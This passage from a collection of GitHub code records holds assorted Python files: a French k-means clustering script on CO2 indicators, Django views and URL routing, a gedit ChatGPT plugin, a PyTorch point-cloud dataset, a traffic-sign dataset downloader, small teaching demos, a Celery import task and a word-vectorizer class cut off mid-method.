np.argsort(kmeans.labels_)\r\n# affichage des observations et leurs groupes\r\nclasse=pd.DataFrame(kmeans.labels_[idk],x.index[idk])\r\n\r\n# 3 - Fusion avec les données\r\n\r\nclustering=pd.merge(data_pays_clustering,classe,left_index=True,right_index=True)\r\nclustering.rename(columns={'EN.ATM.CO2E.GF.ZS' : 'CO2 emissions from gaseous fuel',\r\n'EN.CO2.ETOT.ZS' : 'CO2 emissions from elec and heat prod',\r\n'EN.ATM.CO2E.SF.ZS' : 'CO2 emissions from solid fuel',\r\n'EN.CO2.TRAN.ZS' : 'CO2 emissions from transport',\r\n'EG.USE.COMM.CL.ZS' : 'Alternative and nuclear energy',\r\n'EN.CO2.BLDG.ZS' : 'CO2 emissions from buildings',\r\n'EN.CO2.OTHX.ZS' : 'CO2 emissions from other sectors',\r\n'EN.ATM.CO2E.LF.ZS' : 'CO2 emissions from liquid fuel',\r\n'EG.USE.CRNW.ZS' : 'Combustible renewables and waste',\r\n'EN.ATM.CO2E.PC' : 'emission co2 capita'},inplace=True)\r\n\r\n###################################\r\n# IV - INTERPRETATION\r\n###################################\r\n\r\n# On crée des indices de sur ou sous représentation basés sur la moyenne tous pays confondus\r\n# (base 100 => si l'indice est égal à 100 pour une classe, cela veut dire que la moyenne de \r\n# la classe = moyenne tous pays confondus)\r\n\r\ngb=clustering.groupby(kmeans.labels_)\r\ninterpret_groups = gb.mean() / clustering.mean() * 100\r\ninterpret_groups.rename(columns={'EN.ATM.CO2E.GF.ZS' : 'CO2 emissions from gaseous fuel',\r\n'EN.CO2.ETOT.ZS' : 'CO2 emissions from elec and heat prod',\r\n'EN.ATM.CO2E.SF.ZS' : 'CO2 emissions from solid fuel',\r\n'EN.CO2.TRAN.ZS' : 'CO2 emissions from transport',\r\n'EG.USE.COMM.CL.ZS' : 'Alternative and nuclear energy',\r\n'EN.CO2.BLDG.ZS' : 'CO2 emissions from buildings',\r\n'EN.CO2.OTHX.ZS' : 'CO2 emissions from other sectors',\r\n'EN.ATM.CO2E.LF.ZS' : 'CO2 emissions from liquid fuel',\r\n'EG.USE.CRNW.ZS' : 'Combustible renewables and waste',\r\n'EN.ATM.CO2E.PC' : 'emission co2 capita'},inplace=True)\r\n\r\n# Nombre de pays par cluster\r\n\r\nclustering[\"Country Name\"].groupby(kmeans.labels_).count()\r\n\r\n###################################\r\n# V - VISUALISATION\r\n###################################\r\n\r\nclustering[\"classe\"]=clustering.iloc[:, -1].values\r\n\r\ncolors = {0:'blue', 1:'red', 2:'green', 3:'black'}\r\n\r\nclustering.plot.scatter(x='CO2 emissions from solid fuel', y='CO2 emissions from gaseous fuel', c=clustering[\"classe\"].apply(lambda x: colors[x]))\r\nclustering.plot.scatter(x='CO2 emissions from gaseous fuel', y='Combustible renewables and waste', c=clustering[\"classe\"].apply(lambda x: colors[x]))\r\n\r\n","repo_name":"mariecoo/Etude-de-cas-iAdvize","sub_path":"04 - clustering.py","file_name":"04 - clustering.py","file_ext":"py","file_size_in_byte":5820,"program_lang":"python","lang":"fr","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"}
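One caveat with the clustering pipeline above: K-means is distance based and the WDI indicators live on different scales, so standardizing the features first usually changes (and often improves) the clusters; a hedged sketch of that extra step:

    from sklearn.preprocessing import StandardScaler

    x_scaled = StandardScaler().fit_transform(x)  # zero mean, unit variance per indicator
    kmeans = cluster.KMeans(n_clusters=4, init='k-means++', random_state=0)
    kmeans.fit(x_scaled)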
+{"seq_id":"74491415442","text":"from django.shortcuts import render\n\nfrom django.shortcuts import render\nfrom django.core.files.storage import FileSystemStorage\n\n\ndef image_upload(request):\n if request.method == \"POST\" and request.FILES[\"image_file\"]:\n image_file = request.FILES[\"image_file\"]\n fs = FileSystemStorage()\n filename = fs.save(image_file.name, image_file)\n image_url = fs.url(filename)\n print(image_url)\n return render(request, \"upload.html\", {\n \"image_url\": image_url\n })\n\n spisok = []\n for i in range(1,500):\n spisok.append('n ('+str(i)+').jpg')\n return render(request, \"upload.html\",{'spisok':spisok})\n","repo_name":"ekam230/django-docker-config-dev-prod","sub_path":"app/upload/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":665,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"}
+{"seq_id":"19396694802","text":"# For more info visit the article https://theawless.github.io/How-to-write-plugins-for-gedit/\n\n# This file needs to be placed like ~/.local/share/gedit/plugins/example/__init__.py\n# or renamed like ~/.local/share/gedit/plugins/example.py depending on .plugin file\n\nfrom gi.repository import GObject, Gtk, Gdk, GLib, Gedit, PeasGtk, Gio\nimport os\nimport pathlib \nfrom .conffile import load_conf_dict\nfrom .libchatgpt import chatgpt_query\n\ntextview_textbuffer = None;\n\ndef working_over_text(mytext,dict_conf,action_name,api_key):\n myquery='';\n for cmd in dict_conf['commands']:\n if cmd['name']==action_name:\n myquery=cmd['query'];\n result=chatgpt_query(myquery+mytext,api_key);\n return result;\n\n# For our example application, this class is not exactly required.\n# But we had to make it because we needed the app menu extension to show the menu.\nclass GoToChatGPTAppActivatable(GObject.Object, Gedit.AppActivatable):\n app = GObject.property(type=Gedit.App)\n __gtype_name__ = \"GoToChatGPTAppActivatable\"\n\n def __init__(self):\n GObject.Object.__init__(self)\n self.menu_ext = None;\n self.menu_item = None;\n\n # path of conf file\n self.conf_path=os.path.join(pathlib.Path.home(),'GoToChatGPT.json');\n self.dict_conf = load_conf_dict(self.conf_path);\n \n def do_activate(self):\n self._build_menu()\n\n def _build_menu(self):\n # Get the extension from tools menu \n self.menu_ext = self.extend_menu(\"tools-section\")\n # This is the submenu which is added to a menu item and then inserted in tools menu. \n sub_menu = Gio.Menu();\n\n for dat in self.dict_conf['commands']:\n # (label,name)\n sub_menu_item = Gio.MenuItem.new(dat['summary']+'\\t'+dat['accelerator'],'win.'+dat['name']);\n sub_menu.append_item(sub_menu_item);\n \n self.menu_item = Gio.MenuItem.new_submenu(\"Go To ChatGPT\", sub_menu)\n self.menu_ext.append_menu_item(self.menu_item)\n\n for dat in self.dict_conf['commands']:\n # Setting accelerators, now our action is called when Ctrl+Alt+1 is pressed.\n self.app.set_accels_for_action('win.'+dat['name'], [dat['accelerator']]);\n\n def do_deactivate(self):\n self._remove_menu()\n\n def _remove_menu(self):\n # removing accelerator and destroying menu items\n self.app.set_accels_for_action(\"win.dictonator_start\", ())\n self.menu_ext = None\n self.menu_item = None\n\n\nclass GoToChatGPTWindowActivatable(GObject.Object, Gedit.WindowActivatable, PeasGtk.Configurable):\n window = GObject.property(type=Gedit.Window)\n __gtype_name__ = \"GoToChatGPTWindowActivatable\"\n\n def __init__(self):\n GObject.Object.__init__(self)\n # This is the attachment we will make to bottom panel.\n self.bottom_bar = Gtk.VBox()\n global textview_textbuffer\n textview_textbuffer = None;\n\n # path of conf file\n self.conf_path=os.path.join(pathlib.Path.home(),'GoToChatGPT.json');\n self.dict_conf = load_conf_dict(self.conf_path);\n\n #this is called every time the gui is updated\n def do_update_state(self):\n # if there is no document in sight, we disable the action, so we don't get NoneException\n if self.window.get_active_view() is not None:\n for dat in self.dict_conf['commands']:\n self.window.lookup_action(dat['name']).set_enabled(True)\n\n def do_activate(self):\n # Defining the action which was set earlier in AppActivatable.\n self._connect_menu()\n self._insert_bottom_panel()\n\n def _connect_menu(self):\n for dat in self.dict_conf['commands']:\n action = Gio.SimpleAction(name=dat['name'])\n action.connect('activate', self.action_command)\n 
self.window.add_action(action)\n\n    def action_command(self, action, data):\n        global textview_textbuffer\n        mytext=self._get_selected_text();\n        if mytext!=None:\n            result=working_over_text(mytext,self.dict_conf,action.get_name(),self.dict_conf['api_key']);\n            textview_textbuffer.set_text(result);\n\n    def _insert_bottom_panel(self):\n        global textview_textbuffer\n        textview_panel = Gtk.TextView()\n        textview_panel.set_top_margin(10);\n        textview_panel.set_right_margin(10);\n        textview_panel.set_bottom_margin(10);\n        textview_panel.set_left_margin(10);\n        \n        #textview_panel.modify_bg(Gtk.StateType.NORMAL, Gdk.Color(62535, 62535, 62535))\n        textview_textbuffer = textview_panel.get_buffer()\n        textview_textbuffer.set_text(\"This is some text inside of a Gtk.TextView. \")\n\n        # Add elements to panel.\n        self.bottom_bar.add(textview_panel)\n\n        # Get bottom bar (A Gtk.Stack) and add our bar. \n        panel = self.window.get_bottom_panel()\n        panel.add_titled(self.bottom_bar, 'examplepanel', \"Output ChatGPT\")\n        # Make sure everything shows up.\n        panel.show()\n        self.bottom_bar.show_all()\n        panel.set_visible_child(self.bottom_bar)\n\n    def do_deactivate(self):\n        self._remove_bottom_panel()\n\n    def _remove_bottom_panel(self):\n        panel = self.window.get_bottom_panel()\n        panel.remove(self.bottom_bar)\n\n    ## preferences->plugins->nameplugin->preferences\n    def do_create_configure_widget(self):\n        \n        # Just return your box, PeasGtk will automatically pack it into a box and show it.\n        box=Gtk.VBox()\n        #\n        label1=Gtk.Label(); \n        label1.set_markup('Configure file:');\n        box.add(label1);\n        box.add(Gtk.Label(self.conf_path))\n        #\n        label2=Gtk.Label(); \n        label2.set_markup('API Key:');\n        box.add(label2);\n        box.add(Gtk.Label(self.dict_conf['api_key']))\n        return box\n    \n    # get the selected text\n    def _get_selected_text(self):\n        view = self.window.get_active_view()\n        if view:\n            buffer = view.get_buffer()\n            text = buffer.get_text(buffer.get_start_iter(),\n                                   buffer.get_end_iter(),\n                                   include_hidden_chars=True)\n            selected_text = buffer.get_selection_bounds()\n            if selected_text:\n                start, end = selected_text\n                selected_text = buffer.get_text(start, end, True)\n                #print(\"Selected text: \", selected_text)\n                return selected_text;\n            else:\n                print(\"No text is selected.\")\n                return None;\n        else:\n            print(\"There is no active view in the current window.\")\n            return None;\n\n\n\nclass GoToChatGPTViewActivatable(GObject.Object, Gedit.ViewActivatable):\n    __gtype_name__ = \"GoToChatGPTViewActivatable\"\n\n    view = GObject.property(type=Gedit.View)\n\n    def __init__(self):\n        GObject.Object.__init__(self)\n        # path of conf file\n        self.conf_path=os.path.join(pathlib.Path.home(),'GoToChatGPT.json');\n        self.dict_conf = load_conf_dict(self.conf_path);\n\n    def do_activate(self):\n        #print(\"Plugin created for\", self.view)\n        self.view.translate_view_activatable = self\n        self.popup_handler_id = self.view.connect('populate-popup', self.populate_popup)\n        \n    def do_deactivate(self):\n        print(\"Plugin stopped for\", self.view)\n\n    def do_update_state(self):\n        # Called whenever the view has been updated\n        print(\"Plugin update for\", self.view)\n        \n    def populate_popup(self, view, popup):\n        if not isinstance(popup, Gtk.MenuShell):\n            return\n        \n        item = Gtk.SeparatorMenuItem()\n        item.show()\n        popup.append(item)\n\n        for dat in self.dict_conf['commands']:\n            item = Gtk.MenuItem.new_with_mnemonic(dat['summary']);\n            item.set_sensitive(self.is_enabled());\n            item.show();\n            funcs = lambda i,j=dat['name']: self.working_callback(i,view.get_buffer(),j);\n            
item.connect('activate', funcs);\n popup.append(item);\n \n def working_callback(self,item,document,action_name):\n global textview_textbuffer\n start, end = document.get_selection_bounds();\n mytext = document.get_text(start, end, False);\n\n newtext=working_over_text(mytext,self.dict_conf,action_name,self.dict_conf['api_key']);\n #print(newtext);\n textview_textbuffer.set_text(newtext);\n\n def is_enabled(self):\n document = self.view.get_buffer()\n if document is None:\n return False\n\n start = None\n end = None\n\n try:\n start, end = document.get_selection_bounds()\n\n except:\n pass\n\n return start is not None and end is not None","repo_name":"trucomanx/gedit-plugin-gotochatgpt","sub_path":"gotochatgpt/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":8860,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"}
+{"seq_id":"34202191345","text":"import os\nimport numpy as np\nimport torch.utils.data\n\n\nclass SLPDataset(torch.utils.data.Dataset):\n def __init__(self, cfg, domain, phase, split, cover_conds=[]):\n positions = cfg.SLP_DATASET.POSITION\n if positions == 'all':\n positions = ['supine', 'left', 'right']\n elif positions == 'lateral':\n positions = ['left', 'right']\n else:\n positions = [positions]\n\n if split == 'train':\n # leave out subject 7 due to calibration issue faced by Clever et al.\n subjects = np.concatenate((np.arange(1, 7), np.arange(8, 71)))\n subjects = np.random.default_rng(12345).permutation(subjects)\n if domain == 'source':\n subjects = subjects[:29]\n elif domain == 'target':\n subjects_cov1 = subjects[29:49]\n subjects_cov2 = subjects[49:]\n else:\n raise ValueError()\n elif split == 'val':\n subjects = np.arange(71, 81)\n elif split == 'test':\n subjects = np.arange(81, 103)\n else:\n raise ValueError('The specified split {} is not a valid data split.'.format(split))\n\n # build data list\n self.data_list = []\n if split == 'train' and domain == 'target':\n for subj in subjects_cov1:\n for pos in positions:\n if pos == 'supine':\n pose_no_range = [1, 16]\n elif pos == 'left':\n pose_no_range = [16, 31]\n elif pos == 'right':\n pose_no_range = [31, 46]\n else:\n raise ValueError\n for pose_no in range(pose_no_range[0], pose_no_range[1]):\n item = {'subj_no': subj,\n 'pos': pos,\n 'cover_cond': 'cover1',\n 'pose_no': pose_no\n }\n self.data_list.append(item)\n for subj in subjects_cov2:\n for pos in positions:\n if pos == 'supine':\n pose_no_range = [1, 16]\n elif pos == 'left':\n pose_no_range = [16, 31]\n elif pos == 'right':\n pose_no_range = [31, 46]\n else:\n raise ValueError\n for pose_no in range(pose_no_range[0], pose_no_range[1]):\n item = {'subj_no': subj,\n 'pos': pos,\n 'cover_cond': 'cover2',\n 'pose_no': pose_no\n }\n self.data_list.append(item)\n\n else:\n if cover_conds == []:\n if domain == 'source':\n cover_conds = ['uncover']\n elif domain == 'target':\n cover_conds = ['cover1', 'cover2']\n else:\n raise ValueError()\n for subj in subjects:\n for pos in positions:\n if pos == 'supine':\n pose_no_range = [1, 16]\n elif pos == 'left':\n pose_no_range = [16, 31]\n elif pos == 'right':\n pose_no_range = [31, 46]\n else:\n raise ValueError\n for cover_cond in cover_conds:\n for pose_no in range(pose_no_range[0], pose_no_range[1]):\n item = {'subj_no': subj,\n 'pos': pos,\n 'cover_cond': cover_cond,\n 'pose_no': pose_no\n }\n self.data_list.append(item)\n\n self.root = cfg.SLP_DATASET.ROOT\n self.input_template = '3d_data_{}_{}/danaLab_{:05d}_{}_{:03d}_bed_pcd.npy'\n self.target_template = 'gt_joints_3d/subject_{:03d}_pose_{:02d}_gt_joints.npy'\n\n self.is_train = True if phase == 'train' else False\n\n if self.is_train:\n if domain == 'source':\n self.num_points = cfg.INPUT.NUM_POINTS\n self.rotation = cfg.INPUT.ROT_DEGREE\n self.translation = cfg.INPUT.TRANSLATION\n else:\n self.num_points = cfg.INPUT.NUM_POINTS_TARGET\n self.rotation = cfg.INPUT.ROT_DEGREE_TARGET\n self.translation = cfg.INPUT.TRANSLATION_TARGET\n else:\n self.num_points = cfg.INPUT.NUM_POINTS_TEST\n self.rotation = 0.\n self.translation = 0.\n\n def __getitem__(self, idx):\n # create paths of input pcd and gt joints\n item = self.data_list[idx]\n pcd_path = self.input_template.format(item['pos'],\n item['cover_cond'],\n item['subj_no'],\n item['cover_cond'],\n item['pose_no'])\n joints_path = self.target_template.format(item['subj_no'], item['pose_no'])\n\n # load pcd\n pcd = 
np.float32(np.load(os.path.join(self.root, pcd_path)))\n mean = np.mean(pcd, axis=0)\n pcd -= mean\n\n # load joints\n joints = np.float32(np.load(os.path.join(self.root, joints_path)))\n joints -= mean\n\n # data augmentation:\n if self.is_train and self.rotation > 0.:\n theta = np.deg2rad(np.random.uniform(-self.rotation, self.rotation))\n rotation_matrix = np.float32(np.array([[np.cos(theta), -np.sin(theta), 0],\n [np.sin(theta), np.cos(theta), 0],\n [0., 0., 1.], ]))\n pcd = np.dot(pcd, rotation_matrix)\n joints = np.dot(joints, rotation_matrix)\n\n if self.is_train and self.translation > 0.:\n transl = np.random.uniform(-1., 1., (1, 3)) * self.translation\n pcd += transl\n joints += transl\n\n # subsample points of point cloud\n if self.num_points > 0:\n pts_size = pcd.shape[0]\n\n if pts_size >= self.num_points:\n if self.is_train:\n permutation = np.random.default_rng().permutation(pts_size)\n else:\n permutation = np.random.default_rng(12345).permutation(pts_size)\n pcd = pcd[permutation, :]\n pcd = pcd[:self.num_points, :]\n else:\n if self.is_train:\n pts_idx = np.random.choice(pts_size, self.num_points, replace=True)\n else:\n pts_idx = np.random.default_rng(12345).choice(pts_size, self.num_points, replace=True)\n pcd = pcd[pts_idx, :]\n pcd = pcd.T\n\n return pcd, joints, idx\n\n def __len__(self):\n return len(self.data_list)\n","repo_name":"multimodallearning/da-3dhpe-anatomy","sub_path":"data/slp_dataset.py","file_name":"slp_dataset.py","file_ext":"py","file_size_in_byte":7189,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"3"}
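A quick standalone check (synthetic point, independent of the dataset) of the row-vector rotation used in the augmentation above. With points stored as rows, `points @ R` applies the transpose of R, i.e. a rotation by -theta in the usual column-vector convention; that is harmless here because theta is drawn symmetrically from [-rot, rot].

import numpy as np

theta = np.deg2rad(90.0)
rotation_matrix = np.array([[np.cos(theta), -np.sin(theta), 0.0],
                            [np.sin(theta),  np.cos(theta), 0.0],
                            [0.0,            0.0,           1.0]], dtype=np.float32)
points = np.array([[1.0, 0.0, 0.0]])        # one point, stored as a row
print(np.round(points @ rotation_matrix))   # [[ 0. -1.  0.]] - the transpose of a +90 degree turn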
+{"seq_id":"35333314734","text":"class Person(object):\n    __money = 0\n    school = \"default school\"\n\n    def __init__(self, name, age, gender, money):\n        self.gender = gender\n        self.name = name\n        self.age = age\n        self.__money = money\n\n    def __str__(self):\n        return \"Name: %s, age: %s, gender: %d\" % (self.name, self.age, self.gender)\n\n    def setmoney(self, money):\n        if money < 0:\n            money = 0\n        self.__money = money\n\n    def getmoney(self):\n        print(self.__money)\n        return self.__money\n\np1 = Person('donghao', 18, 0, 1000)\n\n# print all public attributes\nprint(p1.name, p1.age, p1.gender)\n\np1.setmoney(12)\np1.getmoney()\n\n# modify the private attribute through the class's own methods\n# the custom setter/getter implement assignment and retrieval for the private attribute\n\nprint(hasattr(p1, 'name'))\n'''\nYou can also access attributes with the following functions:\n    getattr(obj, name[, default]) : access an attribute of the object.\n    hasattr(obj, name) : check whether an attribute exists.\n    setattr(obj, name, value) : set an attribute; if it does not exist, a new attribute is created.\n    delattr(obj, name) : delete an attribute.\n'''\n","repo_name":"RelaxedDong/python_base","sub_path":"面向对象/访问限制.py","file_name":"访问限制.py","file_ext":"py","file_size_in_byte":1129,"program_lang":"python","lang":"zh","doc_type":"code","stars":1,"dataset":"github-code","pt":"3"}
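A short demo of the attribute helpers listed in the docstring above, reusing the Person class from that record (the values are illustrative):

p2 = Person('alice', 20, 1, 500)
print(getattr(p2, 'name'))     # 'alice'
print(hasattr(p2, 'salary'))   # False
setattr(p2, 'salary', 3000)    # creates a new attribute on the fly
print(p2.salary)               # 3000
delattr(p2, 'salary')
print(hasattr(p2, 'salary'))   # False again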
+{"seq_id":"16840161844","text":"# https://stackoverflow.com/questions/5710867/downloading-and-unzipping-a-zip-file-without-writing-to-disk\n\nfrom io import BytesIO\nfrom zipfile import ZipFile\nfrom urllib.request import urlopen\n\nfrom src.utility.file_utility import remove_folder_tree, move_file, move_directory, create_directory\n\n\ndef init_training_data_folder(training_zip_path='http://benchmark.ini.rub.de/Dataset/GTSRB_Final_Training_Images.zip',\n out_path='data/training'):\n extract_dir_from_web(training_zip_path, out_path)\n move_file('data/training/GTSRB/Readme-Images.txt', out_path + '/readme-images.txt')\n move_directory('data/training/GTSRB/Final_Training/Images', out_path + '/images')\n remove_folder_tree(out_path + '/GTSRB')\n\n\ndef init_testing_data_folder(testing_zip_path='http://benchmark.ini.rub.de/Dataset/GTSRB_Final_Test_Images.zip',\n out_path='data/testing'):\n extract_dir_from_web(testing_zip_path, out_path)\n move_file('data/testing/GTSRB/Readme-Images-Final-test.txt', out_path + '/readme-images-final-test.txt')\n move_directory('data/testing/GTSRB/Final_Test/Images', out_path + '/images')\n remove_folder_tree(out_path + '/GTSRB')\n\n\ndef init_testing_id_file(testing_zip_id_path='http://benchmark.ini.rub.de/Dataset/GTSRB_Final_Test_GT.zip',\n out_path='data/testing'):\n extract_dir_from_web(testing_zip_id_path, out_path)\n move_file('data/testing/GT-final_test.csv', out_path + '/testing_table.csv')\n\n\ndef init_directories(training_path='data/training', testing_path='data/testing'):\n create_directory('model')\n create_directory('model/checkpoints')\n create_directory('model/weights')\n create_directory('log')\n create_directory('stats')\n create_directory(training_path)\n create_directory(testing_path)\n\n\ndef extract_dir_from_web(url, out_dir):\n print('Loading file from url ... \\t(' + url + ')')\n res = urlopen(url)\n\n with ZipFile(BytesIO(res.read())) as zip_object:\n print('Extracting file in ' + out_dir)\n zip_object.extractall(out_dir)\n\n\ndef get_file_name(path):\n return path.split('/')[-1]\n\n","repo_name":"AlessandroStaffolani/traffic-sign-recognition","sub_path":"src/init.py","file_name":"init.py","file_ext":"py","file_size_in_byte":2143,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"}
+{"seq_id":"15372473634","text":"# exploring Python's random number generator\n# (caution: a script named random.py shadows the standard-library random module\n# when run from its own directory)\n\nimport random\n\n\n# This prints a series of random numbers.\n# Note: ** is exponentiation; the original bound 1*10^10 used ^, which is\n# bitwise XOR in Python, so it did not mean ten to the tenth power.\nfor item in range(1, 5):\n    value = random.randint(1, 10**10)\n    print(value)\n\nfood = ['Pizza', 'Burger', 'Doughnut', 'Cheese']\n# rand_food = random.choice(food)\nrandom.shuffle(food)  # shuffles in place and returns None\nprint(food)\n","repo_name":"EngineerDanny/revisiting-python","sub_path":"main/random.py","file_name":"random.py","file_ext":"py","file_size_in_byte":330,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"3"}
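If a shuffled copy is wanted instead of in-place mutation, `random.sample` with `k=len(seq)` is the usual idiom; a small standalone sketch:

import random

food = ['Pizza', 'Burger', 'Doughnut', 'Cheese']
shuffled_copy = random.sample(food, k=len(food))  # new list, original untouched
print(shuffled_copy)
print(food)  # still in the original order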
+{"seq_id":"23516553611","text":"__author__ = \"aki\"\n\n# API Header\n# Package: Basic\n# Modules: All\n# Sub Module: All\n# Usage: This task is used to save import consumer\n# Tables used: ScheduleLog, ReadCycle, Premise, Meter, ConsumerServiceContract, ConsumerDetail\n# Author: Akshay\n# Created on: 26/02/2021\n\nfrom celery.task import task\nfrom v1.commonapp.models.global_lookup import get_global_lookup_by_id\nfrom v1.commonapp.views.logger import logger\nfrom v1.commonapp.models.premises import get_premise_by_id_string\nfrom v1.consumer.models.consumer_master import get_consumer_by_id\nfrom v1.consumer.models.consumer_service_contract_details import get_consumer_service_contract_detail_by_meter_id\nfrom v1.meter_data_management.models.consumer_detail import ConsumerDetail as ConsumerDetailTbl\nfrom v1.meter_data_management.models.meter import Meter as MeterTbl\nfrom v1.meter_data_management.models.read_cycle import get_read_cycle_by_id\nfrom v1.meter_data_management.models.route import get_route_by_id_string\nfrom v1.meter_data_management.models.schedule import get_schedule_by_id\nfrom v1.meter_data_management.models.schedule_log import ScheduleLog as ScheduleLogTbl, SCHEDULE_LOG_STATUS_DICT\n\n\n@task(name=\"ImportConsumer-task\", queue='ImportConsumer')\ndef create_consumer(schedule_log_id):\n try:\n count = 0\n schedule_log_obj = ScheduleLogTbl.objects.get(id=schedule_log_id)\n schedule_log_obj.change_state(SCHEDULE_LOG_STATUS_DICT[\"IN-PROGRESS\"])\n read_cycle_obj = get_read_cycle_by_id(schedule_log_obj.read_cycle_id)\n for route in read_cycle_obj.route_json:\n route_obj = get_route_by_id_string(route['id_string'])\n for premise in route_obj.premises_json:\n premise_obj = get_premise_by_id_string(premise['id_string'])\n meter_obj = MeterTbl.objects.filter(premise_id=premise_obj.id, is_active=True)\n for meter in meter_obj:\n consumer_meter_obj = get_consumer_service_contract_detail_by_meter_id(meter.id)\n consumer_obj = get_consumer_by_id(consumer_meter_obj.consumer_id)\n if ConsumerDetailTbl.objects.filter(schedule_log_id=schedule_log_obj.id,\n consumer_no=consumer_obj.consumer_no,\n meter_no=meter.meter_no,\n is_active=True).exists():\n print('Already Exist')\n count += 1\n else:\n consumer_detail_obj = ConsumerDetailTbl(\n tenant=route_obj.tenant,\n utility=route_obj.utility,\n consumer_id=consumer_obj.id,\n meter_id=meter.id,\n schedule_log_id=schedule_log_obj.id,\n read_cycle_id=read_cycle_obj.id,\n route_id=route_obj.id,\n premise_id=premise_obj.id,\n activity_type_id=schedule_log_obj.activity_type_id,\n utility_product_id=schedule_log_obj.utility_product_id,\n consumer_no=consumer_obj.consumer_no,\n meter_no=meter.meter_no,\n )\n consumer_detail_obj.save()\n\n meter_type_obj = get_global_lookup_by_id(meter.meter_type_id)\n\n if meter_type_obj.key == 'smart':\n consumer_detail_obj.state = 1\n else:\n consumer_detail_obj.state = 0\n\n consumer_detail_obj.save()\n count += 1\n print('Consumer Save')\n\n consumer_detail_count = ConsumerDetailTbl.objects.filter(schedule_log_id=schedule_log_obj.id,\n is_active=True).count()\n schedule_obj = get_schedule_by_id(schedule_log_obj.schedule_id)\n\n if count == 0:\n schedule_log_obj.change_state(SCHEDULE_LOG_STATUS_DICT[\"NO-DATA\"])\n elif count == consumer_detail_count:\n schedule_log_obj.change_state(SCHEDULE_LOG_STATUS_DICT[\"COMPLETED\"])\n schedule_obj.schedule_status = 2\n schedule_obj.save()\n else:\n schedule_log_obj.change_state(SCHEDULE_LOG_STATUS_DICT[\"PARTIAL\"])\n schedule_obj.schedule_status = 2\n schedule_obj.save()\n 
except Exception as ex:\n print(ex)\n logger().log(ex, 'MEDIUM', module='CONSUMER OPS', sub_module='METER DATA')\n","repo_name":"bynryTechnologies/Neovibe-API","sub_path":"api/v1/meter_data_management/task/consumer_detail.py","file_name":"consumer_detail.py","file_ext":"py","file_size_in_byte":4703,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"}
+{"seq_id":"24858188422","text":"from rest_framework import routers\nfrom django.urls import path, include \n\nfrom .views import (\n BlogViewSet,\n CreateViewSet\n)\n\nrouter = routers.DefaultRouter()\nrouter.register('blogs', BlogViewSet, basename='blogs')\nrouter.register('create', CreateViewSet, basename='create')\n\nurlpatterns = [\n path('', include(router.urls)), \n]\n","repo_name":"Azazel5/Personal-Website","sub_path":"blog/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":339,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"}
+{"seq_id":"47338757758","text":"from cms.plugin_base import CMSPluginBase\nfrom cms.plugin_pool import plugin_pool\n\nfrom django.utils.translation import gettext_lazy as _\n\nfrom taccsite_cms.contrib.helpers import concat_classnames\n\nfrom .models import TaccsiteOffset, DIRECTION_DICT\n\n# Helpers\n\n# FAQ: This exists to retrieve classnames via consistently-named functions\n# SEE: taccsite_cms.contrib.taccsite_static_article_list.cms_plugins\ndef get_direction_classname(value):\n    \"\"\"Get direction class based on value.\"\"\"\n    return DIRECTION_DICT.get(value, {}).get('classname')\n\n# Plugins\n\n@plugin_pool.register_plugin\nclass TaccsiteOffsetPlugin(CMSPluginBase):\n    \"\"\"\n    Components > \"Offset Content\" Plugin\n    https://confluence.tacc.utexas.edu/x/FIEjCQ\n    \"\"\"\n    module = 'TACC Site'\n    model = TaccsiteOffset\n    name = _('Offset Content')\n    render_template = 'offset.html'\n\n    cache = True\n    text_enabled = False\n    allow_children = True\n\n    fieldsets = [\n        (None, {\n            'fields': (\n                'direction',\n            )\n        }),\n        (_('Advanced settings'), {\n            'classes': ('collapse',),\n            'fields': (\n                'attributes',\n            )\n        }),\n    ]\n\n    # Render\n\n    def render(self, context, instance, placeholder):\n        context = super().render(context, instance, placeholder)\n        request = context['request']\n\n        classes = concat_classnames([\n            get_direction_classname(instance.direction),\n            instance.attributes.get('class'),\n        ])\n        instance.attributes['class'] = classes\n\n        return context\n","repo_name":"TACC/Core-CMS","sub_path":"taccsite_cms/contrib/taccsite_offset/cms_plugins.py","file_name":"cms_plugins.py","file_ext":"py","file_size_in_byte":1592,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"3"}
+{"seq_id":"73946566161","text":"import math\nimport heapq\n\nfrom collections import Counter, defaultdict\n\nfrom in2110.oblig1b import visualize_word_vectors\n\nfrom in2110.corpora import aviskorpus_10_nn\n\ndef preprocess(sentences):\n    return list(([t.lower() for t in sent.split()] for sent in sentences))\n\ndef context_window(sent, pos, size):\n    return sent[max(pos-size, 0):pos] + sent[pos+1:pos+1+size]\n\nclass WordVectorizer(object):\n    def __init__(self, max_features, window_size, normalize=False):\n        self.max_features = max_features\n        self.window_size = window_size\n        self.normalize = normalize\n        self.matrix = defaultdict(Counter)\n        self.is_normalized = False\n\n    def fit(self, sentences):\n        # Count word frequencies in order to use only the most\n        # frequent words as features.\n        freqs = Counter(t for s in sentences for t in s)\n\n        # Create vocabulary from the most frequent words\n        self.vocab = set(w for w, c in freqs.most_common(self.max_features))\n\n        # Iterate over sentences to build the co-occurrence matrix\n        for sent in sentences:\n            for i in range(len(sent)):\n                t = sent[i]\n                if t in self.vocab:\n                    context = context_window(sent, i, self.window_size)\n\n                    for ct in context:\n                        if ct in self.vocab:\n                            self.matrix[t][ct] += 1\n\n        if self.normalize:\n            self.normalize_vectors()\n\n    def transform(self, words):\n        vecs = []\n        for w in words:\n            assert w in self.matrix\n            vecs.append(self.matrix[w])\n        return vecs\n\n    def vector_norm(self, word):\n        vec = self.matrix[word]\n        return math.sqrt(sum(v**2 for v in vec.values()))\n\n    def normalize_vectors(self):\n        for w, vec in self.matrix.items():\n            norm = self.vector_norm(w)\n\n            for key in vec:\n                vec[key] /= norm\n\n        self.is_normalized = True\n\n    def euclidean_distance(self, w1, w2):\n        vec1, vec2 = self.transform((w1, w2))\n\n        # Save computation by only computing values for features that\n 